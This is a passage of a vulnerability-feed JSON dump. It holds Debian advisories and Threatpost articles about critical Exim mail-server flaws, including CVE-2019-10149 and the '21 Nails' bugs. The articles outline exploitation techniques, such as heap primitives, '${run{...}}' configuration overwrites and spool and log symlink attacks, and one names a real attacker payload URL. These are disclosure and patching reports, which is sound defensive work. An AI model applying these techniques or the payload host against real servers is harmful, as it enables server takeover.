{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T07:14:34", "description": "\nThe Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver\\_message() function may result in the execution of arbitrary\ncommands.\n\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\n\n\nWe recommend that you upgrade your exim4 packages.\n\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\n<https://security-tracker.debian.org/tracker/exim4>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-05T00:00:00", "type": "osv", "title": "exim4 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2022-08-10T07:14:30", "id": "OSV:DSA-4456-1", "href": "https://osv.dev/vulnerability/DSA-4456-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-10-21T18:16:23", "description": "- 
-------------------------------------------------------------------------\nDebian Security Advisory DSA-4912-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 04, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2020-28007 CVE-2020-28008 CVE-2020-28009 CVE-2020-28010\n CVE-2020-28011 CVE-2020-28012 CVE-2020-28013 CVE-2020-28014\n CVE-2020-28015 CVE-2020-28017 CVE-2020-28019 CVE-2020-28021\n CVE-2020-28022 CVE-2020-28023 CVE-2020-28024 CVE-2020-28025\n CVE-2020-28026\n\nThe Qualys Research Labs reported several vulnerabilities in Exim, a\nmail transport agent, which could result in local privilege escalation\nand remote code execution.\n\nDetails can be found in the Qualys advisory at\nhttps://www.qualys.com/2021/05/04/21nails/21nails.txt\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.92-8+deb10u6.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/exim4\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-04T13:53:56", "type": "debian", "title": "[SECURITY] [DSA 4912-1] exim4 security update", "bulletinFamily": "unix", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28017", "CVE-2020-28019", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2021-05-04T13:53:56", "id": "DEBIAN:DSA-4912-1:A1054", "href": "https://lists.debian.org/debian-security-announce/2021/msg00093.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-03T03:12:38", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2650-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Thorsten Alteholz\nMay 05, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : exim4\nVersion : 4.89-2+deb9u8\nCVE ID : CVE-2020-28007 CVE-2020-28008 CVE-2020-28009\n CVE-2020-28011 CVE-2020-28012 CVE-2020-28013\n CVE-2020-28014 CVE-2020-28015 CVE-2020-28017\n CVE-2020-28019 CVE-2020-28020 CVE-2020-28021\n CVE-2020-28022 CVE-2020-28023 CVE-2020-28024\n CVE-2020-28025 CVE-2020-28026\n\n\nThe Qualys Research Labs reported several vulnerabilities in Exim, a mail \ntransport agent, which could result in local privilege escalation and \nremote code execution.\n\n\nDetails can be found in the Qualys advisory at 
\nhttps://www.qualys.com/2021/05/04/21nails/21nails.txt\n\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n4.89-2+deb9u8.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security \ntracker page at: https://security-tracker.debian.org/tracker/exim4\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-05T10:38:28", "type": "debian", "title": "[SECURITY] [DLA 2650-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28017", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2021-05-05T10:38:28", "id": "DEBIAN:DLA-2650-1:EE0B1", "href": 
"https://lists.debian.org/debian-lts-announce/2021/05/msg00004.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-28T09:25:25", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4456-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 05, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2019-10149\n\nThe Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. 
Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/exim4\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-05T15:35:03", "type": "debian", "title": "[SECURITY] [DSA 4456-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-05T15:35:03", "id": "DEBIAN:DSA-4456-1:D32A2", "href": "https://lists.debian.org/debian-security-announce/2019/msg00101.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-05-06T18:52:05", "description": "A veritable cornucopia of security vulnerabilities in the Exim mail server have been uncovered, some of which could be chained together for unauthenticated remote code execution (RCE), gaining root privileges and worm-style lateral movement, according to researchers.\n\nThe Qualys Research Team has discovered a whopping 21 bugs in the popular mail transfer agent (MTA), which was built to send and receive email on major Unix-like operating systems. It comes pre-installed on Linux distributions such as Debian, for instance.\n\n\u201cMTAs are interesting targets for attackers because they are usually accessible over the internet,\u201d according to the Qualys analysis, [issued on Tuesday](<https://www.qualys.com/2021/05/04/21nails/21nails.txt>). 
\u201cOnce exploited, they could modify sensitive email settings on the mail servers, allow adversaries to create new accounts on the target mail servers,\u201d Qualys Senior Manager of Vulnerabilities Bharat Jogi said in a [post](<https://blog.qualys.com/vulnerabilities-research/2021/05/04/21nails-multiple-vulnerabilities-in-exim-mail-server>).\n\nResearchers said that according to a [Shodan search](<https://www.shodan.io/>), nearly 4 million Exim servers are directly exposed to the internet.\n\nOut of the 21 vulns, which Qualys collectively dubbed \u201c21 Nails,\u201d 10 of them can be exploited remotely. And, most of them can be exploited in either default configuration or \u201cin a very common configuration,\u201d according to Qualys. Also, most of them affect all versions of Exim going back to its inception in 2004.\n\n\u201cExim Mail Servers are used so widely and handle such a large volume of the internet\u2019s traffic that they are often a key target for hackers,\u201d Jogi said, noting that last year, a vulnerability in Exim [was a target of](<https://threatpost.com/nsa-sandworm-spy-attacks-exim-mail-servers/156125/>) the Russian advanced persistent threat (APT) known as Sandworm.\n\nHe added, \u201cThe 21 vulnerabilities we found are critical as attackers can remotely exploit them to gain complete root privileges on an Exim system \u2013 allowing compromises such as a remote attacker gaining full root privileges on the target server and executing commands to install programs, modify data, create new accounts and change sensitive settings on the mail servers. It\u2019s imperative that users apply patches immediately.\u201d\n\n## **Exim Patching Status**\n\nQualys researchers wrote and tested [the patches](<https://www.qualys.com/2021/05/04/21nails/21nails.patch>), Jogi told Threatpost; and the \u201cofficial\u201d patches from Exim are modified versions of those (those interested can review both for reference and comparison). 
Exim provided packagers and maintainers (including distros@openwall) with access to its security Git repository for updates.\n\nAs far as the patching status for various Linux distributions goes, Jogi said that the most widely used (CentOS, RHEL and SuSE) have already rolled out fixes. Debian, meanwhile, isn\u2019t vulnerable in the \u201coldstable\u201d (codename Stretch), \u201cstable\u201d (Buster) or \u201cStill-in-development\u201d (Sid) versions. However, the \u201cunstable\u201d (Bullseye) version is vulnerable \u2013 and [has not been patched](<https://security-tracker.debian.org/tracker/source-package/exim4>) as of the time of writing.\n\nAs for other distros, \u201cIt\u2019s hard to tell since there are [hundreds of distributions](<https://en.wikipedia.org/wiki/List_of_Linux_distributions>), and it\u2019s their responsibility to be up-to-date,\u201d he told Threatpost.\n\nAs for in-the-wild exploitation, \u201cwe haven\u2019t seen evidence of exploitation of these vulnerabilities first-hand, but given that most of the vulnerabilities were introduced as far back as 2004, there is a good chance they could be exploited by nation-state actors,\u201d he added.\n\n## **21 Nails Exim Vulnerability List**\n\nThe remotely exploitable bugs are:\n\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\nThese are the local bugs:\n\n * CVE-2020-28007: Link attack in Exim\u2019s log directory\n * 
CVE-2020-28008: Assorted attacks in Exim\u2019s spool directory\n * CVE-2020-28014: Arbitrary file creation and clobbering\n * CVE-2021-27216: Arbitrary file deletion\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n\nAccording to the advisory, an unauthenticated, remote attacker could chain some of these together to create a potentially wormable exploit that would result in privilege escalation to root and the ability to execute commands to install programs, modify data and create new accounts.\n\n## **Technical Dive into 21 Nails: RCE Issues**\n\nQualys is not releasing any full proof-of-concept exploits; however, it did provide various code blocks and plenty of technical details within its analysis.\n\nResearchers said that the CVE-2020-28018 use-after-free bug is the most powerful vulnerability out of the 21. It\u2019s exploitable if the Exim server is built with OpenSSL; and if STARTTLS is enabled and if PIPELINING is enabled (the default); and if X_PIPE_CONNECT is disabled (the default before Exim 4.94).\n\nIt affects the tls_write() function in tls-openssl.c, according to Qualys, and can be exploited in various ways by remote attackers using a struct gstring (server_corked) and its string buffer (server_corked->s):\n\n 1. Overwrite the string buffer (which is sent by tls_write()) and create an information leak by leaking pointers to the heap;\n 2. Overwrite the struct gstring (with an arbitrary string pointer and size) and transform the use-after-free into a read-what-where primitive: It\u2019s possible to then read the heap to locate Exim\u2019s configuration;\n 3. 
Once the write-what-where primitive is achieved, attackers can overwrite Exim\u2019s configuration with an arbitrary \u201c${run{command}}\u201d that is executed by expand_string() as an unprivileged, basic \u201cexim\u201d user.\n\nAnother of the vulnerabilities of note is CVE-2020-28020, an integer overflow that allows an unauthenticated remote attacker to execute arbitrary commands as the \u201cexim\u201d user and snoop data.\n\nIt exists in the receive_msg() function, researchers said, and while powerful, it\u2019s also the most difficult to exploit out of the 21 Nails group, and requires three separate mails to be sent to a target within the same SMTP session.\n\n\u201cBy default, Exim limits the size of a mail header to 1MB,\u201d according to the advisory. \u201cUnfortunately, an attacker can bypass this limit by sending only continuation lines (i.e., \u2018\\n\u2019 followed by \u2018 \u2018 or \u2018\\t\u2019), thereby overflowing the integer header_size.\u201d\n\nHowever, \u201cwhen the integer header_size overflows, it becomes negative\u2026but we cannot exploit the resulting back-jump\u2026because the free size of the current memory block also becomes negative\u2026which prevents us from writing to this back-jumped memory block,\u201d researchers explained. \u201cTo overflow the integer header_size, we must send 1GB to Exim: Consequently, our exploit must succeed after only a few tries (in particular, we cannot brute-force ASLR).\u201d\n\nEither of these vulnerabilities can be used by unauthenticated attackers to gain initial access as an \u201cexim\u201d user on the mail server. 
Once that\u2019s achieved, a bouquet of local privilege escalation (LPE) flaws are on offer to gain full root privileges.\n\n## **LPE for Achieving Root Status**\n\nThe privilege-escalation options include CVE-2020-28007, which allows a link attack in Exim\u2019s log directory.\n\nThe Exim binary is set-user-ID-root, and Exim operates as root in its log directory, which belongs to the \u201cexim\u201d user. So, an attacker with the privileges of the \u201cexim\u201d user can create a symlink (or a hardlink) in the log directory, append arbitrary contents to an arbitrary file and escalate permissions, according to Qualys.\n\nAdversaries could also use CVE-2020-28008 for assorted attacks in Exim\u2019s spool directory, researchers noted. These various vectors include: Directly writing to a spool header file (in the \u201cinput\u201d subdirectory); creating a long-named file in the \u201cdb\u201d subdirectory to overflow a stack-based buffer, or creating a symlink (or a hardlink) in the \u201cdb\u201d subdirectory to take ownership of an arbitrary file.\n\nOther options for LPE to root are CVE-2020-28011 and CVE-2020-28013, both heap buffer-overflow issues; CVE-2020-28010 and CVE-2020-28016, both heap out-of-bounds writes; or CVE-2020-28009, an integer overflow in get_stdinput().\n\n## **Memory-Corruption Bugs Abound**\n\nMost of the vulnerabilities in the advisory are easy-to-exploit memory corruptions that can get around various protections such as ASLR, NX and malloc hardening, according to Qualys.\n\n\u201cExim\u2019s memory allocator\u2026unintentionally provides attackers with powerful exploit primitives,\u201d researchers said. 
\u201cIn particular, if an attacker can pass a negative size to the allocator (through an integer overflow or direct control), then store_get() believes that the current block of memory is large enough (because size is negative), and\u2026as a result, store_get()\u2019s caller can overflow the current block of memory.\u201d\n\nAs a result, the next memory allocation can overwrite the beginning of Exim\u2019s heap. This is \u201ca relative write-what-where, which naturally bypasses ASLR (a \u2018backward-jump\u2019 or \u2018back-jump\u2019),\u201d according to the analysis.\n\nBecause of this, some of the bugs in the writeup can be MacGyvered to allow arbitrary code execution.\n\n\u201cThe beginning of the heap contains Exim\u2019s configuration, which includes various strings that are passed to expand_string() at run time,\u201d researchers explained. \u201cConsequently, an attacker who can back-jump can overwrite these strings with \u2018${run{\u2026}}\u2019 and execute arbitrary commands (thus bypassing NX).\u201d\n\n## **Also of Interest: Authenticated Code Execution as Root**\n\nOne other interesting bug is CVE-2020-28021, a new-line injection into the spool header file that also allows RCE when chained with other issues.\n\n\u201cAn authenticated SMTP client can add an AUTH= parameter to its MAIL FROM command. This AUTH= parameter is decoded by auth_xtextdecode() and the resulting authenticated_sender is written to the spool header file without encoding or escaping,\u201d according to the advisory. 
\u201cUnfortunately, authenticated_sender can contain arbitrary characters, so an authenticated remote attacker can inject new lines into the spool header file and execute arbitrary commands, as root.\u201d\n\nThis vulnerability is particularly problematic for ISPs and mail providers that deploy Exim and offer mail accounts but not shell accounts, researchers added, and it can be chained with an authentication bypass such as [CVE-2020-12783](<https://bugs.exim.org/show_bug.cgi?id=2571>), discovered by Orange Tsai in May 2020, for a full RCE-plus-LPE attack. Further, it can be used for information disclosure.\n", "cvss3": {}, "published": "2021-05-05T18:15:39", "type": "threatpost", "title": "Raft of Exim Security Holes Allow Linux Mail Server Takeovers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2021-05-05T18:15:39", "id": "THREATPOST:63DD69067ED6D0F017DBA81FF1A56760", "href": "https://threatpost.com/exim-security-linux-mail-server-takeovers/165894/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-06T22:07:10", "description": "Microsoft is warning customers that some Azure installations are vulnerable to a recently-disclosed critical Linux Exim mail server flaw that is under active attack.\n\nThe warning comes after a widespread worm campaign was [disclosed on Friday](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>), targeting a flaw in the Exim mail transport agent (MTA), which is a Linux-based mail server that receives, routes and delivers email messages from local users and remote hosts. However, the issue also plagues Azure users: Linux virtual machines, which run Exim servers, can be created through the Azure portal (a browser-based user interface to create VMs and their associated resources).\n\nIn an advisory, Microsoft said that Azure customers using the vulnerable software (Azure customers running virtual machines that use Exim version 4.87 to 4.91) are susceptible to the attack. 
Exim version 4.92 is not vulnerable.\n\n\u201cCustomers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs,\u201d said JR Aquino, manager for Azure Incident Response at Microsoft Security Response Center, in an [advisory posted over the weekend](<https://blogs.technet.microsoft.com/msrc/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/>). \u201cAs this vulnerability is being actively exploited by worm activity, [Microsoft] urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim.\u201d\n\nAn attack of vulnerable systems could allow a malicious actor to gain remote command-execution, take control of the victim machines, search the internet for other machines to infect, and to initiate a cryptominer infection.\n\nMicrosoft for its part said that while it offers \u201cpartial mitigation,\u201d vulnerable systems are still impacted if an attacker\u2019s IP address is permitted through Network Security Groups, which is a list of security rules for virtual machines that allow or deny network traffic to resources connected to Azure Virtual Networks.\n\n\u201cThere is a partial mitigation for affected systems that can filter or block network traffic via Network Security Groups (NSGs),\u201d its advisory said. \u201cThe affected systems can mitigate Internet-based \u2018wormable\u2019 malware or advanced malware threats that could exploit the vulnerability. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker\u2019s IP Address is permitted through Network Security Groups.\u201d\n\nThe flaw stems from improper validation of the recipient address in the deliver_message() function in the server. 
The vulnerability (CVE-2019-10149), which has a critical severity score of 9.8 out of 10 on the CVSS v3 scale, was discovered on [June 5](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) in Exim versions 4.87 to 4.91.\n\nSpecifically under attack is a flaw in Exim-based mail servers, which run almost 57 percent of the internet\u2019s email servers; researchers said that currently more than 3.5 million servers are at risk from the attacks, which are using a wormable exploit.\n\nThe sheer number of vulnerable systems has researchers, vendors and more urging users to patch every Exim installation in their organization and make sure that it is updated to the most recent version, Exim version 4.92.\n\n\u201cAttackers have started probing for and experimenting with attacks against Exim systems vulnerable to CVE-2019-10149,\u201d Satnam Narang, senior research engineer with Tenable, said in an email. \u201cSecurity researchers have observed active exploitation in the wild, one of which includes an attack resulting in permanent root access to vulnerable systems via SSH. It is critically important for those running Exim to upgrade to version 4.92 or apply the backported fix to vulnerable versions in order to prevent these newly discovered attacks from succeeding.\u201d\n", "cvss3": {}, "published": "2019-06-17T15:02:52", "type": "threatpost", "title": "Microsoft Pushes Azure Users to Patch Linux Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T15:02:52", "id": "THREATPOST:97FDAC2A1EE34161937EEA7D58123D3D", "href": "https://threatpost.com/microsoft-pushes-azure-users-to-patch-linux-systems/145749/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-19T22:01:51", "description": "A widespread campaign is exploiting a vulnerability in the Exim mail transport agent (MTA) to gain remote command-execution on victims\u2019 Linux systems. Researchers say that currently more than 3.5 million servers are at risk from the attacks, which are using a wormable exploit.\n\nSpecifically under attack is a flaw in Exim-based mail servers, which run almost 57 percent of the internet\u2019s email servers. Attackers are exploiting the flaw, discovered last week, to take control of the victim machines, search the internet for other machines to infect, and to initiate a cryptominer infection.\n\n\u201cThese kinds of attacks have big implications for organizations,\u201d said researchers with Cybereason in a [post on Thursday](<https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability>). \u201cThe recovery process from this type of attack is costly and time-consuming.\u201d\n\nExim mail servers are open-source MTAs, which essentially receive, route and deliver email messages from local users and remote hosts. 
Exim is the default MTA included on some Linux systems.\n\n## The Flaw\n\nThe flaw stems from improper validation of the recipient address in the deliver_message() function in the server.\n\nThe vulnerability (CVE-2019-10149), which has a critical severity score of 9.8 out of 10 on the CVSS v3 scale, was discovered on [June 5](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) in Exim versions 4.87 to 4.91. Exim version 4.92 is not vulnerable.\n\n\u201cA patch exists already, is being tested, and backported to all versions we released since (and including) 4.87,\u201d according to a recent [security advisory](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>). \u201cThe severity depends on your configuration. It depends on how close to the standard configuration your Exim runtime configuration is. The closer the better.\u201d\n\nAn initial wave of attacks on this vulnerability \u2013 which involved attackers pushing out exploits from a malicious command-and-control (C2) server \u2013 was first discovered June 9 by researcher [Freddie Leeman](<https://twitter.com/freddieleeman/status/1137729455181500421>).\n\n\u201cJust detected the first attempts to exploit recent #exim remote command execution (RCE) security flaw (CVE-2019-10149),\u201d he said in a tweet. \u201cTries to download a script located at http://173.212.214.137/s (careful). If you run Exim, make sure it\u2019s up-to-date.\u201d\n\n> Just detected the first attempts to exploit recent [#exim](<https://twitter.com/hashtag/exim?src=hash&ref_src=twsrc%5Etfw>) remote command execution (RCE) security flaw (CVE-2019-10149). Tries to download a script located at http://173.212.214.137/s (careful). If you run Exim, make sure it's up-to-date. 
[@qualys](<https://twitter.com/qualys?ref_src=twsrc%5Etfw>) [pic.twitter.com/s7veGBcKWO](<https://t.co/s7veGBcKWO>)\n> \n> \u2014 Freddie Leeman (@freddieleeman) [June 9, 2019](<https://twitter.com/freddieleeman/status/1137729455181500421?ref_src=twsrc%5Etfw>)\n\nThen more recently, researchers with Cybereason tracked a second wave of attacks which they believe are launched by a different attacker.\n\n## The Worm Attack\n\nThe more recent and sophisticated campaign first installs an RSA private authentication key on the vulnerable SSH server for root authentication. Once remote command-execution is established, the attacker then deploys a port scanner, to sniff out other vulnerable servers and installs a coin-miner.\n\nIn addition, the campaign appears to be \u201chighly pervasive\u201d with extra measures \u2013 such as installing several payloads at different stages including the port scanner and coin-miner \u2013 for persistence on the infected system.\n\n\u201cIt is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm,\u201d researchers said. 
\u201cThey used hidden services on the TOR network to host their payloads and created deceiving windows i[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/14093602/exim.png>)con files [which is actually a password protected zip archive containing the coin miner executable] in an attempt to throw off researchers and even system administrators who are looking at their logs.\u201d\n\nResearchers said that they are still looking for further information about the attack, but in the meantime urged users to patch every Exim installation in their organization and make sure that it is updated to the most recent version, Exim version 4.92.\n\n\u201cThe prevalence of vulnerable Exim servers (3,683,029 across the globe according to Shodan) allows attackers to compromise many servers in a relatively short period of time, as well as generate a nice stream of cryptocurrency revenue,\u201d researchers said.\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. 
_****_Join _****_Threatpost _****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-14T14:04:30", "type": "threatpost", "title": "Millions of Linux Servers Under Worm Attack Via Exim Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149", "CVE-2020-9586"], "modified": "2019-06-14T14:04:30", "id": "THREATPOST:406129F1455008D4B9A55FF40B09CCAF", "href": "https://threatpost.com/linux-servers-worm-exim-flaw/145698/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:47", "description": "The Russia-linked APT group Sandworm has been spotted exploiting a vulnerability in the internet\u2019s top email server software, according to the National Security Agency (NSA).\n\nThe bug exists in the Exim Mail Transfer Agent (MTA) software, an open-source offering used on Linux and Unix-like systems. It essentially receives, routes and delivers email messages from local users and remote hosts. Exim is the default MTA included on some Linux distros like Debian and Red Hat, and Exim-based mail servers in general run almost 57 percent of the internet\u2019s email servers, according to [a survey last year](<http://www.securityspace.com/s_survey/data/man.201905/mxsurvey.html>).\n\nThe bug ([CVE-2019-10149](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>)) would allow an unauthenticated remote attacker to execute commands with root privileges on an Exim mail server, allowing the attacker to install programs, modify data and create new accounts. It\u2019s also wormable; a previous campaign spread cryptominers automatically from system to system using a port sniffer. 
